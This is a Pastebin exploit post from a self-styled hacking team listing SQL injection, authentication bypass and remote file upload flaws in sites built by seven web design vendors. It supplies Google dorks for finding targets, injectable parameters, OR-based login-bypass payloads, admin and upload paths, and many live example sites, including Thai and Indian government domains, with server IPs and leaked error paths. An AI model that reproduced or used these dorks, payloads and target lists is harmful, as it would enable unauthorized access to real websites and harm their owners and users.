SHARE
TWEET

7 Different Vendors Web Designs SQL Injection 25/01/2019

KingSkrupellos Jan 25th, 2019 1,356 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ####################################################################
  2.  
  3. # Exploit Title : Vinayak * Royalways * Apurva Infosystems AxisCompuTech
  4. * Hands in Technology * Computerization Cell * TimesMedia Hosting * VivaDizayn *
  5. SQL Injection / Authentication Bypass / Remote File Upload
  6. ------------------------------------------------------------------------------------------------
  7. # Author [ Discovered By ] : KingSkrupellos
  8. # Team : Cyberizm Digital Security Army
  9. # Date : 26/01/2019
  10. # Vendor Homepages of Vulnerable Products :
  11. 1) vinayak.com
  12. 2) royalways.com
  13. 3) apurvainfosystems.com - axiscomputech.in
  14. 4) handsintechnology.com
  15. 5) wbprd.nic.in
  16. 6) timesmedia.co.th
  17. 7) vivadizayn.com
  18. # Tested On : Windows and Linux
  19. # Category : WebApps
  20. # Exploit Risk : Medium
  21. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  22. Special Elements used in an SQL Command ('SQL Injection') ]
  23. CWE-264  [ Permissions, Privileges, and Access Controls ]
  24. CWE-592   [ Authentication Bypass Issues ]
  25.  
  26. ####################################################################
  27.  
  28. # There are 6 vendors that their products suffer from remote SQL Injection Vulnerabilities.
  29. ***************************************************************************
  30.  
  31. 1) Designed by Vinayak SQL Injection Vulnerability
  32.  
  33. 2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
  34.  
  35. 3) Designed by Apurva Infosystems SQL Injection Vulnerability
  36.  
  37. 4) Powered By Hands in Technology India SQL Injection Vulnerability
  38.  
  39. 5) Designed & Developed By Computerization Cell
  40.     National Informatics Centre India SQL Injection Vulnerability
  41.  
  42. 6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerabilities
  43.  
  44. 7) Design - Technology VivaDizayn SQL Injection Vulnerability
  45.  
  46. ####################################################################
  47.  
  48. # Google Dorks for Vulnerable Different Products :
  49. ********************************************
  50. 1) intext:designed by Vinayak site:in
  51.  
  52. 2) intext:Website Design By Royalways
  53.  
  54. 3) intext:designed by : Apurva Infosystems
  55.     intext:by Axis Computech & Peripherals Pvt. Ltd.
  56.  
  57. 4) intext:Powered By : Hands in Technology site:in
  58.  
  59. 5) intext:Designed & Developed By Computerization Cell
  60.     intext:Designed and Developed by : National Informatics Centre
  61.  
  62. 6) inurl:''/select_news.php?news_id='' site:go.th
  63.  
  64. 7) intext:Design - Technology VivaDizayn
  65.  
  66. ####################################################################
  67.  
  68. 1) Designed by Vinayak SQL Injection Vulnerability
  69. ********************************************
  70. # Google Dork:
  71. **************
  72. intext:designed by Vinayak site:in
  73.  
  74. # SQL Injection Exploit :
  75. ***********************
  76. /campusupdate.php?id=[SQL Injection]
  77.  
  78. # Example Vulnerable Site :
  79. *************************
  80. [+] gnct.co.in/campusupdate.php?id=78%27
  81.  
  82. Note => (50.28.79.232) => There are 369 domains hosted on this server.
  83.  
  84. Note => (173.236.156.143) => There are 46 domains hosted on this server.
  85.  
  86. # SQL Database Error :
  87. **********************
  88. Warning: mysql_connect(): Access denied for user 'gniot_cognew
  89. '@'localhost' (using password: YES) in /home/gnctgro7916
  90. /gnct.co.in/campusupdate.php on line 42
  91.  
  92. ####################################################################
  93.  
  94. 2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
  95. **************************************************************************
  96. # Google Dork:
  97. **************
  98. intext:Website Design By Royalways
  99.  
  100. # SQL Injection Exploit :
  101. ***********************
  102. /new_arrival.php?count=[SQL Injection]
  103.  
  104. # Admin Login Path :
  105. *******************
  106. /admin/
  107.  
  108. # Authentication Bypass Exploit :
  109. *****************************
  110. Admin username => '=''or'
  111. Admin password => '=''or'
  112.  
  113. /admin/home.php
  114. /admin/add_cat.php
  115. /admin/view_cat.php
  116. /admin/add_product.php
  117. /admin/view_products.php
  118. /admin/add_coupon.php
  119. /admin/manage_coupons.php
  120. /admin/orders_status.php?sort=New
  121. /admin/orders_status.php?sort=Pending
  122. /admin/orders_status.php?sort=Delivered
  123. /admin/manage_shipping.php
  124. /admin/manage_currency.php
  125. /admin/view_all_users.php
  126. /admin/chg_pwd.php
  127.  
  128. # Example Vulnerable Site :
  129. *************************
  130. [+] hnh.in/new_arrival.php?count=1%27
  131.  
  132. Note : (198.49.66.2) => There are 81 domains hosted on this server.
  133.  
  134. Note : (198.49.66.5) => 1 Domain.
  135.  
  136. # SQL Database Error :
  137. **********************
  138. Warning: mysql_num_rows() expects parameter 1 to be
  139.  resource, boolean given in /home/hnhin/public_html
  140. /products_new_arrival.php on line 159
  141.  
  142. ####################################################################
  143.  
  144. 3) Designed by Apurva Infosystems SQL Injection Vulnerability
  145. ******************************************************
  146. # Google Dork :
  147. **************
  148. intext:designed by : Apurva Infosystems
  149. intext:by Axis Computech & Peripherals Pvt. Ltd.
  150.  
  151. # SQL Injection Exploit :
  152. ***********************
  153. /index.php?id=[SQL Injection]
  154.  
  155. /laptops.php?id=[SQL Injection]
  156.  
  157. # Example Vulnerable Site :
  158. *************************
  159. [+] lenovoretail.in/index.php?id=1%27
  160.  
  161. Note : (173.254.75.123) => There are 109 domains hosted on this server.
  162.  
  163. Note : (208.79.234.118) => There are 90 domains hosted on this server.
  164.  
  165. # SQL Database Error :
  166. **********************
  167. Warning: mysql_query(): Access denied for user
  168.  ''@'localhost' (using password: NO) in /home
  169. /lenovoretail/public_html/index.php on line 59
  170.  
  171. ####################################################################
  172.  
  173. 4) Powered By Hands in Technology SQL Injection Vulnerability
  174. *******************************************************
  175. # Google Dork:
  176. **************
  177. intext:Powered By : Hands in Technology site:in
  178.  
  179. # SQL Injection Exploit :
  180. ***********************
  181. /our-campaigns.php?id=[SQL Injection]
  182.  
  183. # Example Vulnerable Site :
  184. *************************
  185. [+] struggleforjustice.in/our-campaigns.php?id=93%27
  186.  
  187. Note : (108.167.158.159) => There are 58 domains hosted on this server.
  188.  
  189. Note : (166.62.27.182) => There are 1,024 domains hosted on this server.
  190.  
  191. # SQL Database Error :
  192. **********************
  193. Deprecated: mysql_query(): The mysql extension is deprecated
  194. and will be removed in the future: use mysqli or PDO instead in /home4/x0v7q0n7
  195. /public_html/struggleforjustice.in/our-campaigns.php on line 74
  196.  
  197. ####################################################################
  198.  
  199. 5) Designed & Developed By Computerization Cell
  200.  National Informatics Centre India SQL Injection Vulnerability
  201. ******************************************************
  202. # Google Dork:
  203. **************
  204. intext:Designed & Developed By Computerization Cell
  205. intext:Designed and Developed by : National Informatics Centre
  206.  
  207. # SQL Injection Exploit :
  208. ***********************
  209. /monthlyreport/cfcpgmonthlyreport.php?district=[SQL Injection]
  210.  
  211. # Example Vulnerable Site :
  212. *************************
  213. [+] wbprdgpms.in/monthlyreport/cfcpgmonthlyreport.php?district=15%27
  214.  
  215. Note : (164.100.178.145) => 2 Domains.
  216.  
  217. Note : (202.61.117.157) => 1 Domain.
  218.  
  219. # SQL Database Error :
  220. **********************
  221. Warning: mysql_fetch_array(): supplied argument is not a valid
  222. MySQL result resource in D:\xampp\htdocs\gpmsstatus
  223. \monthlyReport\cfcpgmonthlyreport.php on line 287
  224.  
  225. ####################################################################
  226.  
  227. 6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerability
  228. ****************************************************************
  229. # Google Dork  :
  230. *****************
  231. inurl:''/select_news.php?news_id='' site:go.th
  232.  
  233. # CopyRight © 2015 www.timesmedia.co.th All Rights Reserved
  234.  
  235. # Note : Thailand Government WebSites are vulnerable.
  236.  
  237. # Admin Control Panel Login Path :
  238. *******************************
  239.  
  240. /login_form.php
  241. /admin.php
  242.  
  243. # SQL Injection Exploits :
  244. ***********************
  245.  
  246. /contact.php?content_id=[SQL Injection]
  247.  
  248. /base.php?content_id=[SQL Injection]
  249.  
  250. /council.php?content_id=[SQL Injection]
  251.  
  252. /history.php?content_id=[SQL Injection]
  253.  
  254. /person.php?content_id=[SQL Injection]
  255.  
  256. /vision.php?content_id=[SQL Injection]
  257.  
  258. /memorable.php?content_id=[SQL Injection]
  259.  
  260. /council.php?content_id=[SQL Injection]
  261.  
  262. /travel.php?content_id=[SQL Injection]
  263.  
  264. /stucture.php?content_id=[SQL Injection]
  265.  
  266. /admin1.php?content_id=[SQL Injection]
  267.  
  268. /otop.php?content_id=[SQL Injection]
  269.  
  270. /news.php?id_type=[SQL Injection]
  271.  
  272. /select_news.php?news_id=[SQL Injection]
  273.  
  274. /policy.php?content_id=[SQL Injection]
  275.  
  276. /office.php?content_id=[SQL Injection]
  277.  
  278. /data.php?content_id=[SQL Injection]
  279.  
  280. /strategy_plan.php?content_id=[SQL Injection]
  281.  
  282. /activity/user_select_photo.php?news_id=[SQL Injection]
  283.  
  284. /vdo/user_select_youtube.php?yt_id=[SQL Injection]
  285.  
  286. Unauthorized Topic Add without Administrator Permission Exploit =>
  287. ***********************************************************
  288.  
  289. TARGET/webboard/new.php?category=webboard
  290.  
  291. TARGET/webboard/index.php?category=webboard
  292.  
  293. Note : Use Mozilla Firefox Open Link No Redirect
  294. Extension to Bypass Admin Control Panel
  295.  
  296. Download and Install on your Browser  =>  
  297.  
  298. addons.mozilla.org/en-US/firefox/addon/noredirect/
  299.  
  300. addons.mozilla.org/en-US/firefox/addon/open-link-directly-no-redirect/
  301.  
  302. Try to use one of the SQL Authentication Exploit Payloads below if not works =>
  303. *******************************************************************
  304.  
  305. Admin Username : anything' OR 'x'='x
  306.  
  307. Admin Password : anything' OR 'x'='x
  308.  
  309. Directory File Path : /fileupload/....
  310.  
  311. Directory File Path : /activity/images/....
  312.  
  313. Remote File Upload Exploit =>
  314. ****************************
  315.  
  316. TARGET/admin/FCKeditor/editor/filemanager/upload/test.html
  317.  
  318. /UserFiles/....
  319.  
  320. Note : Only Thailand Government WebSites [ go.th ] are vulnerable for this issue.
  321.  
  322. # Example Vulnerable Sites :
  323. **************************
  324.  
  325.  => Vulnerable IP Address => 61.19.250.25 =>
  326.  
  327. There are 52 domains hosted on this server.
  328.  
  329. Vendor Homepage Admin Panel => timesmedia.co.th/web58/admin/admin.php
  330.  
  331. [+] banthan.go.th/policy.php?content_id=1%27 =>
  332.  
  333.  [ Proof of Concept for SQL Inj  ] => archive.is/lkrrB
  334.  
  335. [+] makluakao.go.th/webboard/index.php?category=webboard =>
  336.  
  337. [ Proof of Concept ] =>  archive.is/azGk4
  338.  
  339. [+] phoklang.go.th/news.php?id_type=4%27 =>
  340.  
  341. [ Proof of Concept for RFU Vuln ] =>  archive.is/8wk57
  342.  
  343. [+] chongsammor.go.th/select_news.php?news_id=410%27
  344.  
  345. [+] dondang.go.th/base.php?content_id=7
  346.  
  347. [+] hanna-ngam.go.th/admin1.php?content_id=10%27
  348.  
  349. [+] wattananakhon.go.th/news.php?id_type=6%27
  350.  
  351. [+] klonghinpoon.go.th/vision.php?content_id=5%27
  352.  
  353. [+] nongpailomcity.go.th/data.php?content_id=1%27
  354.  
  355. [+] banphokorat.go.th/data.php?content_id=4%27
  356.  
  357. [+] buakho.go.th/history.php?content_id=4%27
  358.  
  359. [+] janaud.go.th/stucture.php?content_id=27%27
  360.  
  361. [+] waengnoiy.go.th/data.php?content_id=1%27
  362.  
  363. [+] huanong.go.th/news.php?id_type=21%27
  364.  
  365. [+] banthan.go.th/policy.php?content_id=1%27
  366.  
  367. # SQL Database Error :
  368. *********************
  369.  
  370. Warning: mysql_fetch_array() expects parameter 1 to be
  371. resource, boolean given in /home/phoklang/
  372. domains/phoklang.go.th/public_html/news.php on line 129
  373.  
  374. ####################################################################
  375.  
  376. 7) Design - Technology VivaDizayn SQL Injection Vulnerability
  377. *****************************************************
  378. # Google Dork:
  379. **************
  380. intext:Design - Technology VivaDizayn
  381.  
  382. # SQL Injection Exploit :
  383. **********************
  384. /en/detay.php?id=[SQL Injection]
  385.  
  386. # Example Vulnerable Site :
  387. ************************
  388. [+] rovelsan.com.tr/en/detay.php?id=696%27
  389.  
  390. Note : (185.67.122.66) => There are 210 domains hosted on this server.
  391.  
  392. # SQL Database Error :
  393. *********************
  394. Warning: mysql_fetch_array(): supplied argument is not a valid
  395. MySQL result resource in /home/rovelsant/domains
  396. /rovelsan.com.tr/public_html/en/detay.php on line 20
  397.  
  398. ####################################################################
  399.  
  400. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  401.  
  402. ####################################################################
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top